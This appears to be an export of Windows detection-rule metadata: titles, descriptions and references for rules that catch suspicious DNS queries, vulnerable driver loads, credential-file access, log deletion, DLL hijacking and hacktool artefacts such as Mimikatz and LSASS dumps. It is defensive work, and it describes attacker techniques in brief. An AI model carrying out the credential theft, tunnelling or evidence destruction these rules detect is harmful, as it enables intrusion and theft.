https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte |
AppX Package Installation Attempts Via AppInstaller.EXE |
Detects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL
|
https://twitter.com/notwhickey/status/1333900137232523264, https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/ |
Cloudflared Tunnels Related DNS Requests |
Detects DNS requests to Cloudflared tunnels domains.
Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, Internal Research |
DNS Query To Devtunnels Domain |
Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2, https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security, https://cydefops.com/devtunnels-unleashed |
DNS Query To AzureWebsites.NET By Non-Browser Process |
Detects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
|
https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/, https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/ |
DNS Server Discovery Via LDAP Query |
Detects DNS server discovery via LDAP query requests from uncommon applications |
https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04 |
DNS HybridConnectionManager Service Bus |
Detects Azure Hybrid Connection Manager services querying the Azure service bus service |
https://twitter.com/Cyb3rWard0g/status/1381642789369286662 |
Suspicious Cobalt Strike DNS Beaconing - Sysmon |
Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons |
https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns, https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/ |
DNS Query To MEGA Hosting Website |
Detects DNS queries for subdomains related to MEGA sharing website |
https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/ |
DNS Query Request By QuickAssist.EXE |
Detects DNS queries initiated by "QuickAssist.exe" to Microsoft Quick Assist primary endpoint that is used to establish a session.
|
https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/, https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/, https://x.com/cyb3rops/status/1862406110365245506, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist |
DNS Query Request To OneLaunch Update Service |
Detects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application.
When the OneLaunch application is installed it will attempt to get updates from this domain.
|
https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf, https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/, https://malware.guide/browser-hijacker/remove-onelaunch-virus/ |
DNS Query Request By Regsvr32.EXE |
Detects DNS queries initiated by "Regsvr32.exe" |
https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/, https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ |
DNS Query To Remote Access Software Domain From Non-Browser App |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution, https://redcanary.com/blog/misbehaving-rats/, https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a, https://blog.sekoia.io/scattered-spider-laying-new-eggs/, https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization |
Suspicious DNS Query for IP Lookup Service APIs |
Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non browser process. |
https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon, https://twitter.com/neonprimetime/status/1436376497980428318, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html |
TeamViewer Domain Query By Non-TeamViewer Application |
Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation) |
https://www.teamviewer.com/en-us/ |
DNS Query Tor .Onion Address - Sysmon |
Detects DNS queries to an ".onion" address related to Tor routing networks |
https://www.logpoint.com/en/blog/detecting-tor-use-with-logpoint/ |
DNS Query To Ufile.io |
Detects DNS queries to "ufile.io", which was seen abused by malware and threat actors as a method for data exfiltration |
https://thedfirreport.com/2021/12/13/diavol-ransomware/ |
DNS Query To Visual Studio Code Tunnels Domain |
Detects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
|
https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://cydefops.com/vscode-data-exfiltration |
Malicious Driver Load |
Detects loading of known malicious drivers via their hash. |
https://loldrivers.io/ |
PUA - System Informer Driver Load |
Detects driver load of the System Informer tool |
https://systeminformer.sourceforge.io/, https://github.com/winsiderss/systeminformer |
Malicious Driver Load By Name |
Detects loading of known malicious drivers via the file name of the drivers. |
https://loldrivers.io/ |
Driver Load From A Temporary Directory |
Detects a driver load from a temporary directory |
Internal Research |
PUA - Process Hacker Driver Load |
Detects driver load of the Process Hacker tool |
https://processhacker.sourceforge.io/ |
Vulnerable Driver Load By Name |
Detects the load of known vulnerable drivers via the file name of the drivers. |
https://loldrivers.io/ |
Vulnerable HackSys Extreme Vulnerable Driver Load |
Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors |
https://github.com/hacksysteam/HackSysExtremeVulnerableDriver |
Vulnerable WinRing0 Driver Load |
Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation |
https://github.com/xmrig/xmrig/tree/master/bin/WinRing0, https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/ |
WinDivert Driver Load |
Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows |
https://reqrypt.org/windivert-doc.html, https://rastamouse.me/ntlm-relaying-via-cobalt-strike/ |
Vulnerable Driver Load |
Detects loading of known vulnerable drivers via their hash. |
https://loldrivers.io/ |
Credential Manager Access By Uncommon Applications |
Detects suspicious processes based on name and location that access the windows credential manager and vault.
Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function
|
https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz, https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
Access To Crypto Currency Wallets By Uncommon Applications |
Detects file access requests to crypto currency files by uncommon processes.
Could indicate potential attempt of crypto currency wallet stealing.
|
Internal Research |
Access To Windows Credential History File By Uncommon Applications |
Detects file access requests to the Windows Credential History File by an uncommon application.
This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function
|
https://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist, https://www.passcape.com/windows_password_recovery_dpapi_credhist |
Access To Windows DPAPI Master Keys By Uncommon Applications |
Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application.
This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function
|
http://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/, https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords |
Access To Potentially Sensitive Sysvol Files By Uncommon Applications |
Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share. |
https://github.com/vletoux/pingcastle |
Microsoft Teams Sensitive File Access By Uncommon Applications |
Detects file access attempts to sensitive Microsoft teams files (leveldb, cookies) by an uncommon process.
|
https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blog/undermining-microsoft-teams-security-by-mining-tokens |
File Creation Date Changed to Another Year |
Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.
Note that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.
|
https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html |
Unusual File Modification by dns.exe |
Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) |
https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html |
Potential PrintNightmare Exploitation Attempt |
Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 |
https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://github.com/cube0x0/CVE-2021-1675 |
Backup Files Deleted |
Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files |
EventLog EVTX File Deleted |
Detects the deletion of the event log files which may indicate an attempt to destroy forensic evidence |
Internal Research |
Exchange PowerShell Cmdlet History Deleted |
Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence |
https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/ |
Process Deletion of Its Own Executable |
Detects the deletion of a process's executable by itself. This is usually not possible without workarounds and may be used by malware to hide its traces.
|
https://github.com/joaoviictorti/RustRedOps/tree/ce04369a246006d399e8c61d9fe0e6b34f988a49/Self_Deletion |
IIS WebServer Access Logs Deleted |
Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence |
https://www.elastic.co/guide/en/security/current/webserver-access-logs-deleted.html |
PowerShell Console History Logs Deleted |
Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence |
Internal Research |
Prefetch File Deleted |
Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence |
Internal Research, https://www.group-ib.com/blog/hunting-for-ttps-with-prefetch-files/ |
TeamViewer Log File Deleted |
Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md |
Tomcat WebServer Logs Deleted |
Detects the deletion of tomcat WebServer logs which may indicate an attempt to destroy forensic evidence |
Internal Research, https://linuxhint.com/view-tomcat-logs-windows/ |
File Deleted Via Sysinternals SDelete |
Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files. |
https://github.com/OTRF/detection-hackathon-apt29/issues/9, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.B.4_83D62033-105A-4A02-8B75-DAB52D8D51EC.md |
Unusual File Deletion by Dns.exe |
Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) |
https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns-exe.html |
ADS Zone.Identifier Deleted By Uncommon Application |
Detects the deletion of the "Zone.Identifier" ADS by an uncommon process. Attackers can leverage this in order to bypass security restrictions that make use of the ADS such as Microsoft Office apps. |
https://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/, Internal Research |
ADSI-Cache File Creation By Uncommon Tool |
Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool. |
https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961, https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/, https://github.com/fox-it/LDAPFragger |
Advanced IP Scanner - File Event |
Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. |
https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/, https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html, https://labs.f-secure.com/blog/prelude-to-ransomware-systembc, https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf, https://thedfirreport.com/2021/01/18/all-that-for-a-coinminer |
Suspicious Binary Writes Via AnyDesk |
Detects AnyDesk writing binary files to disk other than "gcapi.dll".
According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,
which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
|
https://redcanary.com/blog/misbehaving-rats/ |
Anydesk Temporary Artefact |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows |
Assembly DLL Creation Via AspNetCompiler |
Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider.
|
Internal Research |
BloodHound Collection Files |
Detects default file names outputted by the BloodHound collection tool SharpHound |
https://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection |
EVTX Created In Uncommon Location |
Detects the creation of new files with the ".evtx" extension in non-common or non-standard location.
This could indicate tampering with default EVTX locations in order to evade security controls or simply exfiltration of event log to search for sensitive information within.
Note that backup software and legitimate administrator might perform similar actions during troubleshooting.
|
https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key |
Creation Of Non-Existent System DLL |
Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
Usually this technique is used to achieve DLL hijacking.
|
https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992, https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/, https://github.com/Wh04m1001/SysmonEoP, https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/, https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc |
New Custom Shim Database Created |
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.
The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory, https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence, https://liberty-shell.com/sec/2020/02/25/shim-persistence/, https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/ |
Suspicious Screensaver Binary File Creation |
Adversaries may establish persistence by executing malicious content triggered by user inactivity.
Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md |
Files With System DLL Name In Unsuspected Locations |
Detects the creation of a file with the ".dll" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of "System32", "SysWOW64", etc.).
It is highly recommended to perform an initial baseline before using this rule in production.
|
Internal Research |
Files With System Process Name In Unsuspected Locations |
Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).
It is highly recommended to perform an initial baseline before using this rule in production.
|
Internal Research |
Creation Exe for Service with Unquoted Path |
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.
Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md |
Cred Dump Tools Dropped Files |
Files with well-known filenames (parts of credential dump software or files produced by them) creation |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
WScript or CScript Dropper - File |
Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe |
WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846) |
Dynamic CSharp Compile Artefact |
When C# is compiled dynamically, a .cmdline file will be created as a part of the process.
Certain processes are not typically observed compiling C# code, but can do so without touching disk.
This can be used to unpack a payload for execution
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile |
CSExec Service File Creation |
Detects default CSExec service filename which indicates CSExec service installation and execution |
https://github.com/malcomvetter/CSExec |
Potential DCOM InternetExplorer.Application DLL Hijack |
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network |
https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html |
DLL Search Order Hijackig Via Additional Space in Path |
Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)
but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
|
https://twitter.com/cyb3rops/status/1552932770464292864, https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows |
Potentially Suspicious DMP/HDMP File Creation |
Detects the creation of a file with the ".dmp"/".hdmp" extension by a shell or scripting application such as "cmd", "powershell", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash. |
https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps |
Potential Persistence Attempt Via ErrorHandler.Cmd |
Detects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence
The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
|
https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/, https://github.com/last-byte/PersistenceSniper |
Suspicious ASPX File Drop by Exchange |
Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder |
https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/, https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html, https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html |
Suspicious File Drop by Exchange |
Detects suspicious file type dropped by an Exchange component in IIS |
https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/, https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html, https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html |
GoToAssist Temporary Installation Artefact |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows |
HackTool - CrackMapExec File Indicators |
Detects file creation events with filename patterns used by CrackMapExec. |
https://github.com/byt3bl33d3r/CrackMapExec/ |
HackTool - Typical HiveNightmare SAM File Export |
Detects files written by the different tools that exploit HiveNightmare |
https://github.com/GossiTheDog/HiveNightmare, https://github.com/FireFart/hivenightmare/, https://github.com/WiredPulse/Invoke-HiveNightmare, https://twitter.com/cube0x0/status/1418920190759378944 |
HackTool - Dumpert Process Dumper Default File |
Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory |
https://github.com/outflanknl/Dumpert, https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/ |
HackTool - Inveigh Execution Artefacts |
Detects the presence and execution of Inveigh via dropped artefacts |
https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs, https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs, https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/ |
HackTool - Mimikatz Kirbi File Creation |
Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc. |
https://cobalt.io/blog/kerberoast-attack-techniques, https://pentestlab.blog/2019/10/21/persistence-security-support-provider/ |
HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators |
Detects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module. |
https://github.com/CICADA8-Research/RemoteKrbRelay/blob/19ec76ba7aa50c2722b23359bc4541c0a9b2611c/Exploit/RemoteKrbRelay/Relay/Attacks/RemoteRegistry.cs#L31-L40 |
HackTool - NPPSpy Hacktool Usage |
Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md#atomic-test-2---credential-dumping-with-nppspy, https://twitter.com/0gtweet/status/1465282548494487554 |
HackTool - Powerup Write Hijack DLL |
Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
In it's default mode, it builds a self deleting .bat file which executes malicious command.
The detection rule relies on creation of the malicious bat file (debug.bat by default).
|
https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ |
HackTool - QuarksPwDump Dump File |
Detects a dump file written by QuarksPwDump password dumper |
https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm |
HackTool - Potential Remote Credential Dumping Activity Via CrackMapExec Or Impacket-Secretsdump |
Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint. |
https://github.com/Porchetta-Industries/CrackMapExec, https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py |
HackTool - SafetyKatz Dump Indicator |
Detects default lsass dump filename generated by SafetyKatz. |
https://github.com/GhostPack/SafetyKatz, https://github.com/GhostPack/SafetyKatz/blob/715b311f76eb3a4c8d00a1bd29c6cd1899e450b7/SafetyKatz/Program.cs#L63 |
Potential Initial Access via DLL Search Order Hijacking |
Detects attempts to create a DLL file to a known desktop application dependencies folder such as Slack, Teams or OneDrive and by an unusual process. This may indicate an attempt to load a malicious module via DLL search order hijacking. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc, https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0 |
Installation of TeamViewer Desktop |
TeamViewer_Desktop.exe is create during install |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows |
Malicious DLL File Dropped in the Teams or OneDrive Folder |
Detects creation of a malicious DLL file in the location where the OneDrive or Team applications
Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
|
https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ |
ISO File Created Within Temp Folders |
Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp folder. Typical of Qakbot TTP from end-July 2022. |
https://twitter.com/Sam0x90/status/1552011547974696960, https://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html, https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image |
ISO or Image Mount Indicator in Recent Files |
Detects the creation of recent element file that points to an .ISO, .IMG, .VHD or .VHDX file as often used in phishing attacks.
This can be a false positive on server systems but on workstations users should rarely mount .iso or .img files.
|
https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/, https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore, https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/, https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/ |
GatherNetworkInfo.VBS Reconnaissance Script Output |
Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". |
https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government |
LSASS Process Memory Dump Files |
Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials. |
https://www.google.com/search?q=procdump+lsass, https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml, https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/, https://github.com/helpsystems/nanodump, https://github.com/CCob/MirrorDump, https://github.com/safedv/RustiveDump/blob/1a9b026b477587becfb62df9677cede619d42030/src/main.rs#L35, https://github.com/ricardojoserf/NativeDump/blob/01d8cd17f31f51f5955a38e85cd3c83a17596175/NativeDump/Program.cs#L258 |
LSASS Process Dump Artefact In CrashDumps Folder |
Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process. |
https://github.com/deepinstinct/Lsass-Shtinkering, https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf |
WerFault LSASS Process Memory Dump |
Detects WerFault creating a dump file with a name that indicates that the dump file could be an LSASS process memory, which contains user credentials |
https://github.com/helpsystems/nanodump |
Octopus Scanner Malware |
Detects Octopus Scanner Malware. |
https://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain |
Adwind RAT / JRAT File Artifact |
Detects javaw.exe in AppData folder as used by Adwind / JRAT |
https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100, https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf |
File Creation In Suspicious Directory By Msdt.EXE |
Detects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities |
https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd, https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ |
Uncommon File Creation By Mysql Daemon Process |
Detects the creation of files with scripting or executable extensions by Mysql daemon.
Which could be an indicator of "User Defined Functions" abuse to download malware.
|
https://asec.ahnlab.com/en/58878/, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-mysql-malware-infection-via-user-defined-functions-udf/ |
Suspicious DotNET CLR Usage Log Artifact |
Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context. |
